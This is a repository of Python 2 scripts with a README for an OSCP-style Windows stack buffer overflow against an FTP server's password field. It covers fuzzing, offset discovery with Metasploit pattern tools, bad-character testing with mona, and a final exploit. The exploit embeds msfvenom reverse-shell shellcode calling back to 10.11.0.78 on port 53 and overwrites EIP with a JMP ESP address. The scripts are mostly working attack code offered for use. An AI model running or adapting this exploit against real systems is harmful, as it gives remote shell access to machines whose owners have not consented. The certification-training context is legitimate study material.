├── 1_fuzzer.py
├── 2_pattern.py
├── 3_badchars.py
├── 4_exploit.py
├── README.md
└── constants.py


/1_fuzzer.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import sys
 3 | from constants import *
 4 | 
 5 | buffer = ["A"]
 6 | counter = 100
 7 | 
 8 | print "Paste the buffer length that causes crash into constants.py as BUFFER_TOTLEN"
 9 | 
10 | while len(buffer) <= 30:
11 |     buffer.append("A"*counter)
12 |     counter = counter + 200
13 | 
14 | for string in buffer:
15 |     print "fuzzing %s bytes" % len(string)
16 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
17 |     s.connect((HOST, PORT))
18 |     send_payload(s, string)
19 | 


--------------------------------------------------------------------------------
/2_pattern.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import sys
 3 | from constants import *
 4 | 
 5 | print "Plz run: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l %s > pattern" % BUFFER_TOTLEN
 6 | raw_input()
 7 | 
 8 | with open('pattern') as f:
 9 |     buf = f.read().strip()
10 | 
11 | print "Sending pattern.."
12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13 | s.connect((HOST, PORT))
14 | send_payload(s, buf)
15 | 
16 | print "Plz run: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l %s -q EIP_ADDRESS" % BUFFER_TOTLEN
17 | print "And paste the result into constants.py as BUFFER_OFFSET"
18 | 


--------------------------------------------------------------------------------
/3_badchars.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | 
 3 | import socket
 4 | from constants import *
 5 | 
 6 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 7 | s.connect((HOST, PORT))
 8 | 
 9 | badchar_test = ""
10 | badchars = [0x00, 0x0A]
11 | 
12 | for i in range(0x00, 0xFF+1):
13 |     if i not in badchars:
14 |         badchar_test += chr(i)
15 | 
16 | with open('bc.bin', 'wb') as f:
17 |     f.write(badchar_test)
18 | 
19 | buf = ""
20 | buf += "A"*(BUFFER_OFFSET - len(buf))
21 | buf += "BBBB"
22 | buf += badchar_test
23 | buf += "D"*(BUFFER_TOTLEN - len(buf))
24 | buf += "\r\n"
25 | 
26 | send_payload(s, buf)
27 | 
28 | print "Sent: {0}".format(buf)
29 | print "Now transfer the generated bc.bin to the test machine for mona"
30 | print "Look for the address on memory after BBBB - bad chars might start in the middle of address, so add 1-3 accordingly"
31 | print "Transfer bc.bin to machine, and !mona compare -f C:\users\\administrator\desktop\\bc.bin -a ADDRESS_FROM_ABOVE"
32 | print "or faster: !mona bytearray -b '\\x00\\x0a' and !mona compare -f bytearray.bin -a ADDRESS_FROM_ABOVE"
33 | print "Mona will highlight bad char with 00 or -1 or b0 under it, also will list of corrupted characters  - sometimes initial list is inaccurate"
34 | print "Then add bad character to the script and repeat until you get all chars back"
35 | 
36 | 


--------------------------------------------------------------------------------
/4_exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | 
 3 | import socket
 4 | import struct
 5 | from constants import *
 6 | 
 7 | SUB_ESP_10 = "\x83\xec\x10"
 8 | 
 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 | s.connect((HOST, PORT))
11 | 
12 | print "Run !mona jmp -r esp -cpb \"BAD_CHARS\" to find a JMP ESP instruction in Immunity"
13 | print "Then generate appropriate shellcode. see comments"
14 | 
15 | # !mona jmp -r esp -cpb "\x00\x0A"
16 | ptr_jmp_esp = 0x5f4a358f
17 | 
18 | # if that doesn't work, then:
19 | #Modules: !mona modules -- Look for no DEP, NX, ASLR && No Bad Char in address
20 |          #go to the module "e then double click module"
21 |           #!mona find -s esp -m MODULE.dll -cpb "\x00\x0a" "look for JMP ESP or PUSH ESP RETN"
22 |          #if no DEP, you can try "./nasm_shell JMP ESP > FFE4"
23 |           #!mona find -s "\xff\xe4" -m MODULE.dll -cpb "\x00\x0a"
24 |          #Ensure JMP ESP by following address in disassembler "click on it then hit enter"
25 |          #You can also try !mona suggest to see what would work
26 | 
27 | # msfvenom -p windows/shell_reverse_tcp -b '\x00\x0A' -f python -v shellcode EXITFUNC=thread LHOST=10.11.0.78 LPORT=53
28 | shellcode = ""
29 | shellcode += "\xb8\x79\xe2\x6c\xab\xdb\xc0\xd9\x74\x24\xf4\x5b"
30 | shellcode += "\x33\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\xba"
31 | shellcode += "\xe6\x8e\x5e\xc0\x0f\xcc\xa1\x38\xd0\xb1\x28\xdd"
32 | shellcode += "\xe1\xf1\x4f\x96\x52\xc2\x04\xfa\x5e\xa9\x49\xee"
33 | shellcode += "\xd5\xdf\x45\x01\x5d\x55\xb0\x2c\x5e\xc6\x80\x2f"
34 | shellcode += "\xdc\x15\xd5\x8f\xdd\xd5\x28\xce\x1a\x0b\xc0\x82"
35 | shellcode += "\xf3\x47\x77\x32\x77\x1d\x44\xb9\xcb\xb3\xcc\x5e"
36 | shellcode += "\x9b\xb2\xfd\xf1\x97\xec\xdd\xf0\x74\x85\x57\xea"
37 | shellcode += "\x99\xa0\x2e\x81\x6a\x5e\xb1\x43\xa3\x9f\x1e\xaa"
38 | shellcode += "\x0b\x52\x5e\xeb\xac\x8d\x15\x05\xcf\x30\x2e\xd2"
39 | shellcode += "\xad\xee\xbb\xc0\x16\x64\x1b\x2c\xa6\xa9\xfa\xa7"
40 | shellcode += "\xa4\x06\x88\xef\xa8\x99\x5d\x84\xd5\x12\x60\x4a"
41 | shellcode += "\x5c\x60\x47\x4e\x04\x32\xe6\xd7\xe0\x95\x17\x07"
42 | shellcode += "\x4b\x49\xb2\x4c\x66\x9e\xcf\x0f\xef\x53\xe2\xaf"
43 | shellcode += "\xef\xfb\x75\xdc\xdd\xa4\x2d\x4a\x6e\x2c\xe8\x8d"
44 | shellcode += "\x91\x07\x4c\x01\x6c\xa8\xad\x08\xab\xfc\xfd\x22"
45 | shellcode += "\x1a\x7d\x96\xb2\xa3\xa8\x39\xe2\x0b\x03\xfa\x52"
46 | shellcode += "\xec\xf3\x92\xb8\xe3\x2c\x82\xc3\x29\x45\x29\x3e"
47 | shellcode += "\xba\x60\xa5\x40\x74\x1d\xbb\x40\x88\xe8\x32\xa6"
48 | shellcode += "\xe2\x02\x13\x71\x9b\xbb\x3e\x09\x3a\x43\x95\x74"
49 | shellcode += "\x7c\xcf\x1a\x89\x33\x38\x56\x99\xa4\xc8\x2d\xc3"
50 | shellcode += "\x63\xd6\x9b\x6b\xef\x45\x40\x6b\x66\x76\xdf\x3c"
51 | shellcode += "\x2f\x48\x16\xa8\xdd\xf3\x80\xce\x1f\x65\xea\x4a"
52 | shellcode += "\xc4\x56\xf5\x53\x89\xe3\xd1\x43\x57\xeb\x5d\x37"
53 | shellcode += "\x07\xba\x0b\xe1\xe1\x14\xfa\x5b\xb8\xcb\x54\x0b"
54 | shellcode += "\x3d\x20\x67\x4d\x42\x6d\x11\xb1\xf3\xd8\x64\xce"
55 | shellcode += "\x3c\x8d\x60\xb7\x20\x2d\x8e\x62\xe1\x4d\x6d\xa6"
56 | shellcode += "\x1c\xe6\x28\x23\x9d\x6b\xcb\x9e\xe2\x95\x48\x2a"
57 | shellcode += "\x9b\x61\x50\x5f\x9e\x2e\xd6\x8c\xd2\x3f\xb3\xb2"
58 | shellcode += "\x41\x3f\x96"
59 | 
60 | 
61 | buf = ""
62 | buf += "A"*(BUFFER_OFFSET - len(buf))
63 | buf += struct.pack("<I", ptr_jmp_esp)
64 | buf += SUB_ESP_10
65 | buf += shellcode
66 | buf += "D"*(BUFFER_TOTLEN - len(buf))
67 | buf += "\r\n"
68 | 
69 | send_payload(s, buf)
70 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # OSCP Buffer Overflow in 30 minutes
 2 | 
 3 | The scripts are based on [21y4d's work](https://github.com/21y4d/Windows_BufferOverflowx32) with additional automation and improvements lifted from Justin Steven's fantastic [dostackbufferoverflowgood tutorial](https://github.com/justinsteven/dostackbufferoverflowgood) &mdash; props to them.
 4 | 
 5 | The scripts are a bit rough (and are Python 2) but if you've read Justin Steven's guide, it should all make sense.
 6 | 
 7 | 1. Start by modifying `constants.py` to include the `HOSTNAME` and `PORT` of the machine you are attacking.
 8 | 2. You will also need to modify `send_payload()` so that the payload is properly sent to the vulnerable service; the example `send_payload()` interacts with an FTP server with the overflow in the password field.
 9 | 3. Run the scripts in order, following the prompts and comments.
10 | 
11 | 


--------------------------------------------------------------------------------
/constants.py:
--------------------------------------------------------------------------------
 1 | HOST = "127.0.0.1"
 2 | PORT = 4444
 3 | 
 4 | def send_payload(s, payload):
 5 |   s.recv(1024)
 6 |   s.send('USER test\r\n')
 7 |   s.recv(1024)
 8 |   s.send('PASS ' + payload + '\r\n')
 9 |   s.close()
10 | 
11 | BUFFER_TOTLEN = 3000
12 | BUFFER_OFFSET = 2606
13 | 


--------------------------------------------------------------------------------